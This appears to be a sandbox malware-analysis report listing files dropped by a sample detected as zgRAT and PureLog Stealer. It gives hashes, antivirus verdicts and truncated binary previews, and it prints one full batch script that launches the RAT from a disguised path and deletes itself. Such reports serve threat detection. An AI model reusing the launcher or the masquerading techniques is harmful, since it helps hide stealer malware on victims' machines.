                                                                                                  SHA1:7726A5D9634749D08E43BF4871B517850D10EE65
                                                                                                  SHA-256:BFC2532FBC133EB2FBDD1C4108084CCB0478FBE6389A9830EF6D9E0E83EA4C38
                                                                                                  SHA-512:44B5DA3EF8844D6B4149058881E8888B45F5CFC52BCB81EA694BA250FF51ADA7538C6085A5F1F07254145B1998453CBD43DE8A941F1A7DB79C40D12EBF97EA9B
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\jDownloader\config\dllhost.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\config\dllhost.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................)...........*.. ... *...@.. .......................`*...........@...................................*.K.... *.p....................@*...................................................... ............... ..H............text...4.).. ....)................. ..`.rsrc...p.... *.......).............@....reloc.......@*.......).............@..B..................*.....H.......8...........d......s:..T.*......................................0..........(.... ........8........E....N.......M...)...8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0..-....... ........8........E....*...........N...........8%......... ....~....{....:....& ....8....8.... ....~....{....:....& ....8........~....(5...~....(9... ....?d... ....~....{c...:_...& ....8T...~....(-... .... .... ....s....~....(1....... ........8

                                                                                                  C:\Recovery\9e8d7a4ca61bd9

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with very long lines (388), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):388
                                                                                                  Entropy (8bit):5.83669045096348
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:NsjImP9yS1qIm7YEXpx27y3tddlRiubS0yIL/4:KsmP9y5Im7Yo8OtddlRY0nT4
                                                                                                  MD5:4D9AE7481F7955DAEB69F567C653B916
                                                                                                  SHA1:A7AC872CAED3F47E0A78AA52788B86336035085D
                                                                                                  SHA-256:ED1F7005FDDEA02D57EE8C007B7445D467F6645B9AAF162CE04525A3348FE512
                                                                                                  SHA-512:F3DD017DDDBA7F424A289BDCB90C51E293B679F1ADF55D446D56C153D1071815599202615C31724E3A6249B0E1727D52F38837B3CA89CD24EB235104F7D4AE0D
                                                                                                  Malicious:false
                                                                                                  Preview:sqfORQo12jGAfaKsqAxX6G5Uc7O8W9lGmocyACufP0NTezdLwXvZVFblvKwTBqe289X07VroPSHG3m0mdDL9OMvgM1DzPadjVVVecmNbpHJD8VsJUK08ffovN1oGR2ZzyivhRVJ0ztUHDsi1I4eEkeDzqjQl8GJwrUOakK28A9JvLhsfTw7XXUOUe51rFi1skhZseHR8CgDlVSoJ0vRMJvYXF36oSK3bHaKoHABLf8V1Rn9LRr1UQpjyICmkLmp1nld4HAC0tGqKZhGc4uXlSjLb0WfFXaA3TdNpJEEQpBkK8ZYl6KpbOEjEaBEve6cSGx16TaS0pG5Q8Adb74INvjoO4JOH9SwsjREKicRf1yvHJSFainykxPhhJmBKMK0WUMrr

                                                                                                  C:\Recovery\RuntimeBroker.exe

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2751488
                                                                                                  Entropy (8bit):7.727823728421607
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:QAkaLFN8C62dt9FLvRza00IB4Ipg/DCDYjrMmkZHN0qmt12L:QAkaLN62H9JRza0neIpg/eEjrMmbqW2L
                                                                                                  MD5:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  SHA1:7726A5D9634749D08E43BF4871B517850D10EE65
                                                                                                  SHA-256:BFC2532FBC133EB2FBDD1C4108084CCB0478FBE6389A9830EF6D9E0E83EA4C38
                                                                                                  SHA-512:44B5DA3EF8844D6B4149058881E8888B45F5CFC52BCB81EA694BA250FF51ADA7538C6085A5F1F07254145B1998453CBD43DE8A941F1A7DB79C40D12EBF97EA9B
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................)...........*.. ... *...@.. .......................`*...........@...................................*.K.... *.p....................@*...................................................... ............... ..H............text...4.).. ....)................. ..`.rsrc...p.... *.......).............@....reloc.......@*.......).............@..B..................*.....H.......8...........d......s:..T.*......................................0..........(.... ........8........E....N.......M...)...8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0..-....... ........8........E....*...........N...........8%......... ....~....{....:....& ....8....8.... ....~....{....:....& ....8........~....(5...~....(9... ....?d... ....~....{c...:_...& ....8T...~....(-... .... .... ....s....~....(1....... ........8

                                                                                                  C:\Users\Default\Videos\OfficeClickToRun.exe

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2751488
                                                                                                  Entropy (8bit):7.727823728421607
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:QAkaLFN8C62dt9FLvRza00IB4Ipg/DCDYjrMmkZHN0qmt12L:QAkaLN62H9JRza0neIpg/eEjrMmbqW2L
                                                                                                  MD5:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  SHA1:7726A5D9634749D08E43BF4871B517850D10EE65
                                                                                                  SHA-256:BFC2532FBC133EB2FBDD1C4108084CCB0478FBE6389A9830EF6D9E0E83EA4C38
                                                                                                  SHA-512:44B5DA3EF8844D6B4149058881E8888B45F5CFC52BCB81EA694BA250FF51ADA7538C6085A5F1F07254145B1998453CBD43DE8A941F1A7DB79C40D12EBF97EA9B
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Videos\OfficeClickToRun.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Videos\OfficeClickToRun.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................)...........*.. ... *...@.. .......................`*...........@...................................*.K.... *.p....................@*...................................................... ............... ..H............text...4.).. ....)................. ..`.rsrc...p.... *.......).............@....reloc.......@*.......).............@..B..................*.....H.......8...........d......s:..T.*......................................0..........(.... ........8........E....N.......M...)...8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0..-....... ........8........E....*...........N...........8%......... ....~....{....:....& ....8....8.... ....~....{....:....& ....8........~....(5...~....(9... ....?d... ....~....{c...:_...& ....8T...~....(-... .... .... ....s....~....(1....... ........8

                                                                                                  C:\Users\Default\Videos\e6c9b481da804f

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with very long lines (453), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):453
                                                                                                  Entropy (8bit):5.851088134418762
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:HosCj5YRBjTT6jFsdRL3qns9mVsxrq2YS:HosCj52eKD3qnYF
                                                                                                  MD5:026D3D8E0DDB8392FD40493EA177626C
                                                                                                  SHA1:57C2E3BC2FC427499B2279DAD15BD02C4E709FC8
                                                                                                  SHA-256:6D465284A563E410339BF55CA3ADB30F6AEB973A43D0897CF7893A22341EAE14
                                                                                                  SHA-512:08E1832E798AE4FB3D6491A09F68B51490E59B870D36D25308860D905ECEA79A223B2E3656E8859FC027A8F325BCFAEFA7B419F12864D29A1943877BE05C3C9B
                                                                                                  Malicious:false
                                                                                                  Preview:rFtBU54Cl1MsCn9NOGLjYedKuTp53IEAUpz56gLFTF0hfuQpFdcMw1DNljRBQ8JcwMYXxEQr5GPTn6o9DA0Zq2OclmTXOKyV5XuSW21BNuRpmtjp4S7QHtw485vLu2dvR3XPMWnKIzM6ki02Coc6MiNMlzUaHpQUQgYsVTdiowHShzUZE3IGahisqLoWBNCci1pEJIgsL4RZb4ovf4VOhK4t7pCKpGgbuouqKPP6WZ4fPJRvg21G1y5X75GeGVCEX0pwK8lPpZ1HPYeyYQnxPak5tWsPJv0BW0HYdfliQlbc6xIiaSFzsPz7QtDxPWG3i0uZQGU2pFgn8I95OKy0pBTHBKItbxT4fi3GCsRU7MJmsL8IuHiEhPNhhnYG7ka2wmHaO22f3d3c1qYzMA9UOOWQUWiZUKWXwR0GEh31PCLEVup1Oi37lGnhP0F2UdLsGgqjz

                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ComponentBrokermonitor.exe.log

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1382
                                                                                                  Entropy (8bit):5.365673074279152
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNt1qE4GIs1E4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIT
                                                                                                  MD5:1F5121093A9EE34BCE821E70ED53B2EF
                                                                                                  SHA1:8EBA7D53402458E9F6B238C876FFC5A0BE4C90EE
                                                                                                  SHA-256:6075C30BA70160FF8DB47E95C8569278A13795503B2309659E31DD818C2230C5
                                                                                                  SHA-512:C8DDC54E54239A82AD49F638A8A434885C1AC2EA7F000E5E1E0D2F0C7729905DCD94870F7895E3682BE3619A1A8580E5A8D21D13311F29E35C0E790054594CE8
                                                                                                  Malicious:false
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                                                  C:\Users\user\AppData\Local\Temp\S2ennV6xhF

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):25
                                                                                                  Entropy (8bit):4.4838561897747224
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:9uVO0:8b
                                                                                                  MD5:73971421F3F87AF09D05AC95F3F55333
                                                                                                  SHA1:4889E6215DBC32E2DB8ECD02EA7FE04D38A30F55
                                                                                                  SHA-256:86B441D7EDE39FC8CF5017C6ECB52860172C8FE4477CCD3988FBD00A251836EE
                                                                                                  SHA-512:B6E3C571C826271BEEA645A847DB95C9C7D4D9715C884FA0D6AAE945CCD35171DEEBB365DFA754DFA2AF5446AC043FE12BC128CC2CD2CCFFA99BC6560E0E1D24
                                                                                                  Malicious:false
                                                                                                  Preview:mDyjWeM4TthB5bGTq8Yw6kXeQ

                                                                                                  C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):205
                                                                                                  Entropy (8bit):5.097896160799696
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:hCijTg3Nou1SV+DE7ZxvIKOZG1wkn23fCJNe:HTg9uYDE7vCfKa
                                                                                                  MD5:9F5BA9FE0276521D46D919AF31136BC0
                                                                                                  SHA1:4C1DF61B048904F9F6BCED9AD737CEDF33A254A1
                                                                                                  SHA-256:3B7F7C2403DD142AC091F3F2DB8F14F60A0B6086C752FBBA2B83185525B6FA23
                                                                                                  SHA-512:111F22D287F81D0C7A3907AF3E145B87C2541F950C1FD760C0F1954A215B5DB9F68DB071E4A8E533C50F5285600CB766A01CCC22208D204F1E844BC2D050908E
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\RuntimeBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\uT6K3ltlhZ.bat"

                                                                                                  C:\Users\user\Desktop\ERuFRGqx.log

                                                                                                  Download File
                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):33792
                                                                                                  Entropy (8bit):5.541771649974822
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: KzLetzDiM8.exe, Detection: malicious, Browse
                                                                                                  • Filename: f3I38kv.exe, Detection: malicious, Browse
                                                                                                  • Filename: ZZ2sTsJFrt.exe, Detection: malicious, Browse
                                                                                                  • Filename: r6cRyCpdfS.exe, Detection: malicious, Browse
                                                                                                  • Filename: Z4D3XAZ2jB.exe, Detection: malicious, Browse
                                                                                                  • Filename: cbCjTbodwa.exe, Detection: malicious, Browse
                                                                                                  • Filename: vb8DOBZQ4X.exe, Detection: malicious, Browse
                                                                                                  • Filename: 6G8OR42xrB.exe, Detection: malicious, Browse
                                                                                                  • Filename: XNPOazHpXF.exe, Detection: malicious, Browse
                                                                                                  • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                  C:\Users\user\Desktop\HCaVYTBq.log

                                                                                                  Download File
                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):69632
                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                  C:\Users\user\Desktop\HufwPOBJ.log

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):70144
                                                                                                  Entropy (8bit):5.909536568846014
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                  C:\Users\user\Desktop\JfKMXbLC.log

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):46592
                                                                                                  Entropy (8bit):5.870612048031897
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                  C:\Users\user\Desktop\MqhNXtrC.log

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):69632
                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                  C:\Users\user\Desktop\PYnlzHQq.log

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):33792
                                                                                                  Entropy (8bit):5.541771649974822
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                  C:\Users\user\Desktop\eKDszVMz.log

                                                                                                  Download File
                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32256
                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                  C:\Users\user\Desktop\gNqaUEQu.log

                                                                                                  Download File
                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):342528
                                                                                                  Entropy (8bit):6.170134230759619
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                  C:\Users\user\Desktop\jpaRTMbF.log

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):342528
                                                                                                  Entropy (8bit):6.170134230759619
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
